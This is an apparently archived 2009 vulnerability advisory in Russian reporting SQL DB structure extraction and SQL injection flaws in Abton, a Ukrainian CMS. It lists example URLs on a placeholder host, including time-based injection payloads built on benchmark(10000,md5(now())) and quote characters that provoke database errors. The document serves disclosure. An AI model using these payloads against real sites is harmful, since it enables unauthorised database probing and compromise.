Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:22825
HistoryNov 25, 2009 - 12:00 a.m.

Vulnerabilities in Abton

2009-11-2500:00:00
vulners.com
11

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною SQL DB Structure Extraction и SQL Injection уязвимостях в Abton (это
украинская CMS).

SQL DB Structure Extraction:

http://site/rus/details/13220/

http://site/rus/referaty/’/

http://site/rus/’/

http://site/rus/referaty/1/-1/

http://site/abton/

SQL Injection:

http://site/rus/details/’+benchmark(10000,md5(now()))+’/

http://site/rus/referaty/1?+benchmark(10000,md5(now()))-’1/

http://site/rus/’+benchmark(10000,md5(now()))+’/

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/2886/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua